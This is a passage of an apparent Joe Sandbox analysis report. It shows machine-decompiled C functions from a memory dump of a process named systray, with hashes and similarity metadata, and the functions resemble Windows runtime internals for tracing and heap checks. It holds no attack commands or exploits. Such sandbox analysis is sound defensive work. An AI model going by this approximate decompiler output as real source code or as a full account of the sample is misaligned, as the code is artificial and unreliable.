                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10c70f6faac4acb6a31fb15197ac74aad881cb52898f405117b375051690c7a6
                                            • Instruction ID: ef45efde300369db1f6949696e6290ca9bac38d8269e25e5409505b2f12b988a
                                            • Opcode Fuzzy Hash: 10c70f6faac4acb6a31fb15197ac74aad881cb52898f405117b375051690c7a6
                                            • Instruction Fuzzy Hash: A6015271E00219AFDB14DFA9D841FAEB7B8FF85710F00416AB905EB380E674AE01D795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E04661074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                            				char _v8;
                                            				void* _v11;
                                            				unsigned int _v12;
                                            				void* _v15;
                                            				void* __esi;
                                            				void* __ebp;
                                            				char* _t16;
                                            				signed int* _t35;
                                            
                                            				_t22 = __ebx;
                                            				_t35 = __ecx;
                                            				_v8 = __edx;
                                            				_t13 =  !( *__ecx) + 1;
                                            				_v12 =  !( *__ecx) + 1;
                                            				if(_a4 != 0) {
                                            					E0466165E(__ebx, 0x4688ae4, (__edx -  *0x4688b04 >> 0x14) + (__edx -  *0x4688b04 >> 0x14), __edi, __ecx, (__edx -  *0x4688b04 >> 0x14) + (__edx -  *0x4688b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                            				}
                                            				E0465AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                            				if(E045B7D50() == 0) {
                                            					_t16 = 0x7ffe0388;
                                            				} else {
                                            					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				if( *_t16 != 0) {
                                            					_t16 = E0464FE3F(_t22, _t35, _v8, _v12);
                                            				}
                                            				return _t16;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98405792b9e7b1bcd7d965144566c4ff2e65ca6445b9778d9bc434e56e1d7735
                                            • Instruction ID: 4e20d45414e944ef693ba1b55a3e388bf78bcfc7a4318cd3d3a603ffce21e83c
                                            • Opcode Fuzzy Hash: 98405792b9e7b1bcd7d965144566c4ff2e65ca6445b9778d9bc434e56e1d7735
                                            • Instruction Fuzzy Hash: B9014772604781AFDB10EF68C900B5A77E5ABC4314F048A2DF886837A0FE30F940CB96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E045AB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                            				signed char _t11;
                                            				signed char* _t12;
                                            				intOrPtr _t24;
                                            				signed short* _t25;
                                            
                                            				_t25 = __edx;
                                            				_t24 = __ecx;
                                            				_t11 = ( *[fs:0x30])[0x50];
                                            				if(_t11 != 0) {
                                            					if( *_t11 == 0) {
                                            						goto L1;
                                            					}
                                            					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                            					L2:
                                            					if( *_t12 != 0) {
                                            						_t12 =  *[fs:0x30];
                                            						if((_t12[0x240] & 0x00000004) == 0) {
                                            							goto L3;
                                            						}
                                            						if(E045B7D50() == 0) {
                                            							_t12 = 0x7ffe0385;
                                            						} else {
                                            							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                            						}
                                            						if(( *_t12 & 0x00000020) == 0) {
                                            							goto L3;
                                            						}
                                            						return E04617016(_a4, _t24, 0, 0, _t25, 0);
                                            					}
                                            					L3:
                                            					return _t12;
                                            				}
                                            				L1:
                                            				_t12 = 0x7ffe0384;
                                            				goto L2;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                            • Instruction ID: 661f424eed707f43ac23cf7c33ee131c130483d15bde03d59ddcd3b39fdb0718
                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                            • Instruction Fuzzy Hash: 34018471700580DFD322C75CD944F6A77E8FB45754F0944A1FB19CB651E628FC40E662
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E0464FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v12;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				short _v58;
                                            				char _v64;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_t24 = __ebx;
                                            				_v12 =  *0x468d360 ^ _t32;
                                            				_t30 = __edx;
                                            				_t31 = __ecx;
                                            				E045DFA60( &_v64, 0, 0x30);
                                            				_v24 = _a4;
                                            				_v32 = _t31;
                                            				_v28 = _t30;
                                            				_v58 = 0x267;
                                            				if(E045B7D50() == 0) {
                                            					_t18 = 0x7ffe0388;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v64);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e4a62be2eaf847936e5582473327e9b18529cad76efa8e585e32394f66820f4
                                            • Instruction ID: 71e57108306b2f9fe80e32355320ddae2fda4a536ead133b0db7b36b0c215288
                                            • Opcode Fuzzy Hash: 7e4a62be2eaf847936e5582473327e9b18529cad76efa8e585e32394f66820f4
                                            • Instruction Fuzzy Hash: BB018871E00219BFDB14DF69D845FAEB7B8EF84704F00406AB9019B381E974AA01D795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E0464FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v12;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				short _v58;
                                            				char _v64;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_t24 = __ebx;
                                            				_v12 =  *0x468d360 ^ _t32;
                                            				_t30 = __edx;
                                            				_t31 = __ecx;
                                            				E045DFA60( &_v64, 0, 0x30);
                                            				_v24 = _a4;
                                            				_v32 = _t31;
                                            				_v28 = _t30;
                                            				_v58 = 0x266;
                                            				if(E045B7D50() == 0) {
                                            					_t18 = 0x7ffe0388;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v64);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4842b560c6dd7410138a87363087a9c28ce5db3f19659ecb84c7be0b6c110c6c
                                            • Instruction ID: b37311bbf1593b5803e240fdcca80cd1f18a0ff3b4d07ed386b0c1e79520e422
                                            • Opcode Fuzzy Hash: 4842b560c6dd7410138a87363087a9c28ce5db3f19659ecb84c7be0b6c110c6c
                                            • Instruction Fuzzy Hash: A7018871E00219AFDB14DB69D845FAEBBB8EF85704F04406AB9019B380E974AD01D795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 54%
                                            			E04668ED6(intOrPtr __ecx, intOrPtr __edx) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				short _v62;
                                            				char _v68;
                                            				signed char* _t29;
                                            				intOrPtr _t35;
                                            				intOrPtr _t41;
                                            				intOrPtr _t42;
                                            				signed int _t43;
                                            
                                            				_t40 = __edx;
                                            				_v8 =  *0x468d360 ^ _t43;
                                            				_v28 = __ecx;
                                            				_v62 = 0x1c2a;
                                            				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                            				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                            				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                            				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                            				_v24 = __edx;
                                            				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                            				if(E045B7D50() == 0) {
                                            					_t29 = 0x7ffe0386;
                                            				} else {
                                            					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v68);
                                            				_push(0x1c);
                                            				_push(0x20402);
                                            				_push( *_t29 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03ac229e4f332717e957b2d74b7a75ead88e52f08f05e3913b3a2e0b537d9338
                                            • Instruction ID: 7e817d6c3a526d428e26a5c309132acc501d4271092b5b833db3c694578724c5
                                            • Opcode Fuzzy Hash: 03ac229e4f332717e957b2d74b7a75ead88e52f08f05e3913b3a2e0b537d9338
                                            • Instruction Fuzzy Hash: 03112170E012199FDB04DFA8D541BAEF7F4FF48300F0442AAE519EB382E634A940DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0459B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                            				signed char* _t13;
                                            				intOrPtr _t22;
                                            				char _t23;
                                            
                                            				_t23 = __edx;
                                            				_t22 = __ecx;
                                            				if(E045B7D50() != 0) {
                                            					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                            				} else {
                                            					_t13 = 0x7ffe0384;
                                            				}
                                            				if( *_t13 != 0) {
                                            					_t13 =  *[fs:0x30];
                                            					if((_t13[0x240] & 0x00000004) == 0) {
                                            						goto L3;
                                            					}
                                            					if(E045B7D50() == 0) {
                                            						_t13 = 0x7ffe0385;
                                            					} else {
                                            						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                            					}
                                            					if(( *_t13 & 0x00000020) == 0) {
                                            						goto L3;
                                            					}
                                            					return E04617016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                            				} else {
                                            					L3:
                                            					return _t13;
                                            				}
                                            			}






                                            C-Code - Quality: 46%
                                            			E0462FE87(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				short _v54;
                                            				char _v60;
                                            				signed char* _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t32;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				signed int _t35;
                                            
                                            				_v8 =  *0x468d360 ^ _t35;
                                            				_v16 = __ecx;
                                            				_v54 = 0x1722;
                                            				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                            				_v28 =  *((intOrPtr*)(__ecx + 4));
                                            				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                            				if(E045B7D50() == 0) {
                                            					_t21 = 0x7ffe0382;
                                            				} else {
                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                            				}
                                            				_push( &_v60);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t21 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                            			}
















                                            C-Code - Quality: 48%
                                            			E04668F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				short _v50;
                                            				char _v56;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_v8 =  *0x468d360 ^ _t32;
                                            				_v16 = __ecx;
                                            				_v50 = 0x1c2c;
                                            				_v24 = _a4;
                                            				_v20 = _a8;
                                            				_v12 = __edx;
                                            				if(E045B7D50() == 0) {
                                            					_t18 = 0x7ffe0386;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v56);
                                            				_push(0x10);
                                            				_push(0x402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                            			}















                                            C-Code - Quality: 48%
                                            			E0465131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				short _v50;
                                            				char _v56;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_v8 =  *0x468d360 ^ _t32;
                                            				_v20 = _a4;
                                            				_v12 = _a8;
                                            				_v24 = __ecx;
                                            				_v16 = __edx;
                                            				_v50 = 0x1021;
                                            				if(E045B7D50() == 0) {
                                            					_t18 = 0x7ffe0380;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				}
                                            				_push( &_v56);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                            			}















                                            C-Code - Quality: 100%
                                            			E045BC577(void* __ecx, char _a4) {
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t17;
                                            				void* _t19;
                                            				void* _t20;
                                            				void* _t21;
                                            
                                            				_t18 = __ecx;
                                            				_t21 = __ecx;
                                            				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E045BC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x45711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					__eflags = _a4;
                                            					if(__eflags != 0) {
                                            						L10:
                                            						E046688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                            						L9:
                                            						return 0;
                                            					}
                                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                            					if(__eflags == 0) {
                                            						goto L10;
                                            					}
                                            					goto L9;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}









                                            C-Code - Quality: 94%
                                            			E04652073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                            				void* __esi;
                                            				signed char _t3;
                                            				signed char _t7;
                                            				void* _t19;
                                            
                                            				_t17 = __ecx;
                                            				_t3 = E0464FD22(__ecx);
                                            				_t19 =  *0x468849c - _t3; // 0x0
                                            				if(_t19 == 0) {
                                            					__eflags = _t17 -  *0x4688748; // 0x0
                                            					if(__eflags <= 0) {
                                            						E04651C06();
                                            						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                            						__eflags = _t3;
                                            						if(_t3 != 0) {
                                            							L5:
                                            							__eflags =  *0x4688724 & 0x00000004;
                                            							if(( *0x4688724 & 0x00000004) == 0) {
                                            								asm("int3");
                                            								return _t3;
                                            							}
                                            						} else {
                                            							_t3 =  *0x7ffe02d4 & 0x00000003;
                                            							__eflags = _t3 - 3;
                                            							if(_t3 == 3) {
                                            								goto L5;
                                            							}
                                            						}
                                            					}
                                            					return _t3;
                                            				} else {
                                            					_t7 =  *0x4688724; // 0x0
                                            					return E04648DF1(__ebx, 0xc0000374, 0x4685890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                            				}
                                            			}







                                            C-Code - Quality: 43%
                                            			E04668D34(intOrPtr __ecx, intOrPtr __edx) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				short _v42;
                                            				char _v48;
                                            				signed char* _t12;
                                            				intOrPtr _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t25;
                                            				signed int _t26;
                                            
                                            				_t23 = __edx;
                                            				_v8 =  *0x468d360 ^ _t26;
                                            				_v16 = __ecx;
                                            				_v42 = 0x1c2b;
                                            				_v12 = __edx;
                                            				if(E045B7D50() == 0) {
                                            					_t12 = 0x7ffe0386;
                                            				} else {
                                            					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v48);
                                            				_push(8);
                                            				_push(0x20402);
                                            				_push( *_t12 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                            			}














                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03eccf9ac8656b0a42788fe4894839c5c2e33c88f3d1301461639020decb00d7
                                            • Instruction ID: 470b85a972b9dc5af30d03b50b7d04a4ab889e118a1d0df977d9f0d622d99cf9
                                            • Opcode Fuzzy Hash: 03eccf9ac8656b0a42788fe4894839c5c2e33c88f3d1301461639020decb00d7
                                            • Instruction Fuzzy Hash: C2F0B470E04608AFD714EFB8D441A6E77B4FF58300F10809AE906EB380EA34F900D764
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 54%
                                            			E045D927A(void* __ecx) {
                                            				signed int _t11;
                                            				void* _t14;
                                            
                                            				_t11 = L045B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                            				if(_t11 != 0) {
                                            					E045DFA60(_t11, 0, 0x98);
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                            					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                            					E045D92C6(_t11, _t14);
                                            				}
                                            				return _t11;
                                            			}






                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                            • Instruction ID: b8d43c9cc10815fd94c98a78e4e2f8954f7b99a032eb51e13017b9a3c858d598
                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                            • Instruction Fuzzy Hash: 62E06D72240A416BE7219E5ADC84B5776A9AFC2725F044079B9045E282CAE6E90997E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E045B746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                            				signed int _t8;
                                            				void* _t10;
                                            				short* _t17;
                                            				void* _t19;
                                            				intOrPtr _t20;
                                            				void* _t21;
                                            
                                            				_t20 = __esi;
                                            				_t19 = __edi;
                                            				_t17 = __ebx;
                                            				if( *((char*)(_t21 - 0x25)) != 0) {
                                            					if(__ecx == 0) {
                                            						E045AEB70(__ecx, 0x46879a0);
                                            					} else {
                                            						asm("lock xadd [ecx], eax");
                                            						if((_t8 | 0xffffffff) == 0) {
                                            							_push( *((intOrPtr*)(__ecx + 4)));
                                            							E045D95D0();
                                            							L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                            							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                            							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                            						}
                                            					}
                                            					L10:
                                            				}
                                            				_t10 = _t19 + _t19;
                                            				if(_t20 >= _t10) {
                                            					if(_t19 != 0) {
                                            						 *_t17 = 0;
                                            						return 0;
                                            					}
                                            				}
                                            				return _t10;
                                            				goto L10;
                                            			}










                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4de603c9e22efa5fbe1f1cf9544e0f80b04da55101491add3d020cdae32782bc
                                            • Instruction ID: 1dfce42b222bd246701a11e153af714fe268e33c31034f8e080742327d0dd3c7
                                            • Opcode Fuzzy Hash: 4de603c9e22efa5fbe1f1cf9544e0f80b04da55101491add3d020cdae32782bc
                                            • Instruction Fuzzy Hash: FAF0B435B44145AADF119B68C940BF9BB71BF88316F040695D8D1AB550F764B801B7C5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 36%
                                            			E04668CD6(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				short _v38;
                                            				char _v44;
                                            				signed char* _t11;
                                            				intOrPtr _t17;
                                            				intOrPtr _t22;
                                            				intOrPtr _t23;
                                            				intOrPtr _t24;
                                            				signed int _t25;
                                            
                                            				_v8 =  *0x468d360 ^ _t25;
                                            				_v12 = __ecx;
                                            				_v38 = 0x1c2d;
                                            				if(E045B7D50() == 0) {
                                            					_t11 = 0x7ffe0386;
                                            				} else {
                                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v44);
                                            				_push(0xffffffe4);
                                            				_push(0x402);
                                            				_push( *_t11 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                            			}














                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05923cd82928d588c8c0cfd0f6013d8d723f17e7ca3a642dbb4717d073c49804
                                            • Instruction ID: 0282a94184ad1c2df7208105657aad67a550477875a78340695108f3b61dbf82
                                            • Opcode Fuzzy Hash: 05923cd82928d588c8c0cfd0f6013d8d723f17e7ca3a642dbb4717d073c49804
                                            • Instruction Fuzzy Hash: C7F08270A05209AFDB04EBB8E945EAE77B4FF59304F10019AE916EB3C0EA34E900D764
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 36%
                                            			E04668B58(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v20;
                                            				short _v46;
                                            				char _v52;
                                            				signed char* _t11;
                                            				intOrPtr _t17;
                                            				intOrPtr _t22;
                                            				intOrPtr _t23;
                                            				intOrPtr _t24;
                                            				signed int _t25;
                                            
                                            				_v8 =  *0x468d360 ^ _t25;
                                            				_v20 = __ecx;
                                            				_v46 = 0x1c26;
                                            				if(E045B7D50() == 0) {
                                            					_t11 = 0x7ffe0386;
                                            				} else {
                                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v52);
                                            				_push(4);
                                            				_push(0x402);
                                            				_push( *_t11 & 0x000000ff);
                                            				return E045DB640(E045D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                            			}














                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6661957e8bd142bf189f520db181649bccc16fbfe3f6d1db68957006fa4d680
                                            • Instruction ID: 4bf020b5f74f822ceeef4368fd2ad1c66ca1d91cd59a12cadbaa9d39074e2cda
                                            • Opcode Fuzzy Hash: e6661957e8bd142bf189f520db181649bccc16fbfe3f6d1db68957006fa4d680
                                            • Instruction Fuzzy Hash: 9DF082B0A05259AFEB10EBB8D906E6E73B8FF44304F040459BA06DB3C0FA74E900D794
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E04594F2E(void* __ecx, char _a4) {
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t17;
                                            				void* _t19;
                                            				void* _t20;
                                            				void* _t21;
                                            
                                            				_t18 = __ecx;
                                            				_t21 = __ecx;
                                            				if(__ecx == 0) {
                                            					L6:
                                            					__eflags = _a4;
                                            					if(__eflags != 0) {
                                            						L8:
                                            						E046688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                            						L9:
                                            						return 0;
                                            					}
                                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                            					if(__eflags != 0) {
                                            						goto L9;
                                            					}
                                            					goto L8;
                                            				}
                                            				_t18 = __ecx + 0x30;
                                            				if(E045BC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4571030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					goto L6;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}










                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
